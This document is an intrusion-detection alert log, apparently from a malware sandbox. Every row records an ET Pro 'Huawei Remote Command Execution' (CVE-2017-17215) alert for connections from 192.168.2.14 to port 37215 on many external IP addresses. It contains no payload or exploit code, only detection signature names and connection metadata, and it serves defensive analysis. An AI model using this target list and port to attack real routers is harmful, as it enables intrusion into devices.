                                                    07/10/24-08:26:45.633588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672837215192.168.2.14157.198.26.20
                                                    07/10/24-08:27:22.813779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434037215192.168.2.14197.160.0.87
                                                    07/10/24-08:27:20.496994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161837215192.168.2.1441.249.195.178
                                                    07/10/24-08:26:28.877940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092037215192.168.2.14188.207.22.80
                                                    07/10/24-08:26:43.606854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266237215192.168.2.1441.204.111.123
                                                    07/10/24-08:26:43.709645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5614037215192.168.2.1436.74.53.144
                                                    07/10/24-08:27:03.033670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119237215192.168.2.1441.50.223.94
                                                    07/10/24-08:26:15.865384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106237215192.168.2.14197.195.191.225
                                                    07/10/24-08:27:08.397659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913237215192.168.2.1441.26.240.186
                                                    07/10/24-08:27:24.983853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338037215192.168.2.14197.15.43.220
                                                    07/10/24-08:26:53.178125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689437215192.168.2.14157.150.199.192
                                                    07/10/24-08:27:27.151315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727237215192.168.2.14197.191.67.190
                                                    07/10/24-08:26:34.255856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393037215192.168.2.14157.26.156.254
                                                    07/10/24-08:26:52.068814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946437215192.168.2.14157.41.41.92
                                                    07/10/24-08:26:43.893458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868437215192.168.2.14197.69.179.172
                                                    07/10/24-08:27:20.465433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913637215192.168.2.14183.96.188.59
                                                    07/10/24-08:26:59.822867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646237215192.168.2.14157.50.85.35
                                                    07/10/24-08:27:13.980831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953037215192.168.2.14157.44.243.100
                                                    07/10/24-08:26:38.520023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054437215192.168.2.14157.60.206.41
                                                    07/10/24-08:27:22.784576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3402437215192.168.2.1441.141.103.118
                                                    07/10/24-08:26:22.216142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3904837215192.168.2.14197.74.85.109
                                                    07/10/24-08:27:02.714102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.1441.193.30.117
                                                    07/10/24-08:26:20.119674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258837215192.168.2.1441.87.223.179
                                                    07/10/24-08:27:31.540383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918637215192.168.2.14197.149.78.222
                                                    07/10/24-08:26:18.001524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029237215192.168.2.14169.202.24.116
                                                    07/10/24-08:26:42.418339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932037215192.168.2.14197.26.160.61
                                                    07/10/24-08:27:13.721350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875437215192.168.2.1441.212.146.219
                                                    07/10/24-08:27:17.011385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994437215192.168.2.14197.192.135.198
                                                    07/10/24-08:27:20.420210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.1441.185.78.240
                                                    07/10/24-08:27:23.925907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661437215192.168.2.14157.76.239.72
                                                    07/10/24-08:26:55.406930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624037215192.168.2.14197.181.38.169
                                                    07/10/24-08:26:15.878157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553037215192.168.2.14157.34.157.225
                                                    07/10/24-08:27:13.996170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801437215192.168.2.14197.227.21.132
                                                    07/10/24-08:27:07.325434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993837215192.168.2.142.149.72.29
                                                    07/10/24-08:26:42.394014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342237215192.168.2.14197.206.228.238
                                                    07/10/24-08:26:28.837922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4871037215192.168.2.14157.125.55.150
                                                    07/10/24-08:27:22.748001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4107437215192.168.2.14164.66.217.142
                                                    07/10/24-08:26:25.508243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5268637215192.168.2.14157.220.229.56
                                                    07/10/24-08:26:28.684788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770237215192.168.2.1441.223.248.86
                                                    07/10/24-08:27:22.479791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186637215192.168.2.1441.202.128.76
                                                    07/10/24-08:26:20.108378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6073837215192.168.2.1436.80.154.43
                                                    07/10/24-08:27:27.158777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003037215192.168.2.14197.246.139.195
                                                    07/10/24-08:26:45.632030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721637215192.168.2.14197.62.86.5
                                                    07/10/24-08:27:31.486586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052437215192.168.2.14132.237.166.123
                                                    07/10/24-08:26:47.908603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883237215192.168.2.14197.216.47.57
                                                    07/10/24-08:26:23.355050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876437215192.168.2.14197.150.137.185
                                                    07/10/24-08:27:10.561451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399237215192.168.2.14197.30.31.189
                                                    07/10/24-08:26:41.427067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.14157.120.75.30
                                                    07/10/24-08:26:52.020494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6093037215192.168.2.14197.78.25.224
                                                    07/10/24-08:26:49.810296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5107837215192.168.2.1484.87.26.59
                                                    07/10/24-08:26:57.610016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230437215192.168.2.14132.30.171.167
                                                    07/10/24-08:26:57.647233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529037215192.168.2.1441.173.194.181
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770037215192.168.2.14197.216.109.75
                                                    07/10/24-08:27:07.361334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270237215192.168.2.14157.96.179.177
                                                    07/10/24-08:26:41.545063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421837215192.168.2.14157.213.65.106
                                                    07/10/24-08:27:24.914980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789037215192.168.2.1441.134.238.165
                                                    07/10/24-08:26:25.430749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801237215192.168.2.1441.60.237.83
                                                    07/10/24-08:26:34.243243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.1441.34.142.181
                                                    07/10/24-08:26:59.828075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486037215192.168.2.14197.56.241.128
                                                    07/10/24-08:26:43.839334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964437215192.168.2.14197.151.149.61
                                                    07/10/24-08:27:11.516345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300037215192.168.2.1441.237.242.254
                                                    07/10/24-08:26:33.254511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283237215192.168.2.1441.141.141.101
                                                    07/10/24-08:26:20.157992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518637215192.168.2.1441.78.241.220
                                                    07/10/24-08:26:15.837578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475237215192.168.2.1441.5.204.44
                                                    07/10/24-08:26:43.752135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985637215192.168.2.1495.22.151.78
                                                    07/10/24-08:27:17.000608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856237215192.168.2.1441.94.20.48
                                                    07/10/24-08:26:41.615223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495437215192.168.2.14157.167.148.25
                                                    07/10/24-08:27:05.134098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831837215192.168.2.14197.228.9.130
                                                    07/10/24-08:26:13.830759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848437215192.168.2.14157.29.13.246
                                                    07/10/24-08:26:13.829838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866037215192.168.2.14197.26.192.254
                                                    07/10/24-08:26:28.763475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701037215192.168.2.14157.34.118.185
                                                    07/10/24-08:26:20.153663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759437215192.168.2.14157.159.170.160
                                                    07/10/24-08:26:41.616249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554437215192.168.2.14157.103.39.9
                                                    07/10/24-08:27:22.468391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531837215192.168.2.1441.44.227.193
                                                    07/10/24-08:26:14.621724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791837215192.168.2.14197.195.182.19
                                                    07/10/24-08:27:20.495859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721237215192.168.2.1443.232.55.87
                                                    07/10/24-08:27:27.132803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152237215192.168.2.14197.246.105.159
                                                    07/10/24-08:26:11.610519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567637215192.168.2.14157.247.11.168
                                                    07/10/24-08:26:15.821130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4399837215192.168.2.1441.239.82.233
                                                    07/10/24-08:27:19.170631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388037215192.168.2.1441.132.99.12
                                                    07/10/24-08:27:22.926314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161037215192.168.2.1441.5.209.123
                                                    07/10/24-08:26:13.766150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605837215192.168.2.1473.41.204.150
                                                    07/10/24-08:26:28.822867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994237215192.168.2.1441.162.110.188
                                                    07/10/24-08:26:52.015024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381837215192.168.2.1441.238.159.96
                                                    07/10/24-08:26:59.724469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580637215192.168.2.14197.142.222.165
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755637215192.168.2.14200.45.254.154
                                                    07/10/24-08:26:14.732568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644237215192.168.2.1441.2.94.99
                                                    07/10/24-08:27:02.974935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631837215192.168.2.14157.192.61.245
                                                    07/10/24-08:26:28.633014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4931637215192.168.2.14197.160.66.4
                                                    07/10/24-08:27:31.553494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404637215192.168.2.14197.193.7.45
                                                    07/10/24-08:27:14.827269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648837215192.168.2.14194.25.240.185
                                                    07/10/24-08:27:11.514451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636837215192.168.2.1441.27.229.70
                                                    07/10/24-08:27:17.027342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925237215192.168.2.1469.168.113.115
                                                    07/10/24-08:26:13.826034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443837215192.168.2.1441.45.132.242
                                                    07/10/24-08:26:33.161010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617837215192.168.2.1441.79.49.82
                                                    07/10/24-08:26:23.273552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876437215192.168.2.1497.252.2.231
                                                    07/10/24-08:27:13.973446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155237215192.168.2.14157.17.42.221
                                                    07/10/24-08:27:23.962795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434037215192.168.2.14197.73.168.8
                                                    07/10/24-08:26:33.223099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615637215192.168.2.1448.111.168.84
                                                    07/10/24-08:26:17.995767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626237215192.168.2.1441.107.135.49
                                                    07/10/24-08:26:23.308313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798237215192.168.2.1441.105.154.139
                                                    07/10/24-08:26:25.514524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920637215192.168.2.14197.128.184.161
                                                    07/10/24-08:27:08.444805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3642037215192.168.2.1441.93.3.135
                                                    07/10/24-08:26:59.828075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679437215192.168.2.14134.105.160.78
                                                    07/10/24-08:27:20.428275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208237215192.168.2.1441.39.254.200
                                                    07/10/24-08:27:10.537865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143037215192.168.2.14157.245.183.131
                                                    07/10/24-08:26:18.015833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006437215192.168.2.14197.245.208.165
                                                    07/10/24-08:26:36.437126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778637215192.168.2.14157.235.6.246
                                                    07/10/24-08:27:08.439677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619437215192.168.2.14157.133.234.46
                                                    07/10/24-08:27:27.141072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680637215192.168.2.14157.226.76.214
                                                    07/10/24-08:26:13.759189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562437215192.168.2.1441.84.105.26
                                                    07/10/24-08:26:13.767213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574237215192.168.2.14197.103.234.199
                                                    07/10/24-08:26:31.046263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773037215192.168.2.14157.61.175.213
                                                    07/10/24-08:27:27.151855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434637215192.168.2.14197.60.140.171
                                                    07/10/24-08:27:20.512534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3775037215192.168.2.14197.166.21.3
                                                    07/10/24-08:26:45.644371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596037215192.168.2.14157.143.204.24
                                                    07/10/24-08:27:22.564607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921237215192.168.2.1463.125.125.45
                                                    07/10/24-08:27:27.151855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831437215192.168.2.1441.59.7.161
                                                    07/10/24-08:26:47.948537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702837215192.168.2.14157.6.172.63
                                                    07/10/24-08:26:28.920818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820837215192.168.2.14157.226.129.197
                                                    07/10/24-08:26:23.360287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730037215192.168.2.14197.186.218.255
                                                    07/10/24-08:26:29.858032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698437215192.168.2.1441.8.184.24
                                                    07/10/24-08:27:05.072343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948837215192.168.2.14157.171.2.131
                                                    07/10/24-08:27:27.144985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389837215192.168.2.14197.158.37.42
                                                    07/10/24-08:26:11.542221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789237215192.168.2.14157.94.171.151
                                                    07/10/24-08:26:33.196702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4926437215192.168.2.14157.212.249.230
                                                    07/10/24-08:27:23.941043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294037215192.168.2.1441.99.190.13
                                                    07/10/24-08:27:05.230856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519437215192.168.2.14187.95.157.199
                                                    07/10/24-08:27:19.320404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706637215192.168.2.14157.130.206.33
                                                    07/10/24-08:26:28.911510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708837215192.168.2.14136.159.238.244
                                                    07/10/24-08:27:03.011735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517637215192.168.2.1441.241.105.141
                                                    07/10/24-08:26:28.911510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.1441.168.138.33
                                                    07/10/24-08:27:13.761969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694037215192.168.2.14197.176.159.37
                                                    07/10/24-08:26:57.644926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043437215192.168.2.14197.9.141.36
                                                    07/10/24-08:26:52.008729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321037215192.168.2.14124.101.214.55
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878437215192.168.2.14197.190.180.129
                                                    07/10/24-08:26:25.489238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349437215192.168.2.14197.46.80.161
                                                    07/10/24-08:26:55.400410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798437215192.168.2.1441.101.69.12
                                                    07/10/24-08:27:08.439676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432037215192.168.2.14197.144.36.198
                                                    07/10/24-08:26:14.796120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048837215192.168.2.14157.176.117.196
                                                    07/10/24-08:26:15.869789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516437215192.168.2.14149.70.238.196
                                                    07/10/24-08:26:28.801971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502837215192.168.2.14157.115.37.248
                                                    07/10/24-08:26:25.498788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999237215192.168.2.1441.152.28.63
                                                    07/10/24-08:27:07.362991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737837215192.168.2.1441.143.64.87
                                                    07/10/24-08:26:22.300019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873837215192.168.2.14100.40.17.52
                                                    07/10/24-08:27:17.033866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591837215192.168.2.14157.166.184.3
                                                    07/10/24-08:26:55.449640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619237215192.168.2.1464.86.203.230
                                                    07/10/24-08:26:33.254426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691037215192.168.2.1441.103.151.167
                                                    07/10/24-08:27:22.757983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322637215192.168.2.14197.93.84.248
                                                    07/10/24-08:26:57.660601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3545637215192.168.2.14157.51.98.214
                                                    07/10/24-08:27:31.489200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572637215192.168.2.1441.27.223.91
                                                    07/10/24-08:26:25.466944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.1441.119.17.101
                                                    07/10/24-08:26:55.385824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808837215192.168.2.1441.236.234.243
                                                    07/10/24-08:26:36.411416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3300037215192.168.2.1465.196.89.42
                                                    07/10/24-08:26:41.446486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759837215192.168.2.1441.183.98.235
                                                    07/10/24-08:26:28.648107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216637215192.168.2.14129.4.116.239
                                                    07/10/24-08:26:43.681536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881837215192.168.2.14201.210.41.81
                                                    07/10/24-08:26:45.658661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873437215192.168.2.14157.92.55.194
                                                    07/10/24-08:26:45.666546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429837215192.168.2.14197.154.122.190
                                                    07/10/24-08:27:07.291242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082637215192.168.2.1441.32.153.66
                                                    07/10/24-08:26:25.456232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143837215192.168.2.14197.179.44.109
                                                    07/10/24-08:26:26.581833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717037215192.168.2.1460.107.150.18
                                                    07/10/24-08:26:41.503829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097437215192.168.2.1441.18.10.76
                                                    07/10/24-08:26:38.647269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903237215192.168.2.14197.114.14.46
                                                    07/10/24-08:27:14.855642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5272837215192.168.2.1441.235.147.64
                                                    07/10/24-08:27:33.758837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425637215192.168.2.14197.120.144.6
                                                    07/10/24-08:26:36.357505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014037215192.168.2.14157.150.81.54
                                                    07/10/24-08:27:24.985108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.14197.76.107.115
                                                    07/10/24-08:26:33.255405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092037215192.168.2.1445.191.37.236
                                                    07/10/24-08:27:17.066216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339237215192.168.2.14197.200.162.142
                                                    07/10/24-08:27:20.517321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820237215192.168.2.14157.200.6.89
                                                    07/10/24-08:26:26.618604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410837215192.168.2.14157.245.176.132
                                                    07/10/24-08:27:19.224533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904837215192.168.2.14157.132.91.214
                                                    07/10/24-08:26:28.798195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498037215192.168.2.1441.217.189.41
                                                    07/10/24-08:27:13.983145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778837215192.168.2.1441.90.77.156
                                                    07/10/24-08:26:59.577459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396237215192.168.2.1441.31.215.223
                                                    07/10/24-08:26:34.188754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725637215192.168.2.1441.97.174.73
                                                    07/10/24-08:26:48.027883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169037215192.168.2.1441.75.21.166
                                                    07/10/24-08:26:23.351340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745037215192.168.2.14197.80.22.8
                                                    07/10/24-08:27:34.124026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705837215192.168.2.14157.255.134.138
                                                    07/10/24-08:26:17.928888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6039237215192.168.2.1441.78.249.216
                                                    07/10/24-08:26:23.344652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507637215192.168.2.14197.133.97.223
                                                    07/10/24-08:26:43.846786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899637215192.168.2.14157.247.76.173
                                                    07/10/24-08:27:22.936367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576237215192.168.2.14157.252.241.222
                                                    07/10/24-08:26:55.366242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661037215192.168.2.1441.79.200.131
                                                    07/10/24-08:27:11.556328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877237215192.168.2.14157.85.138.200
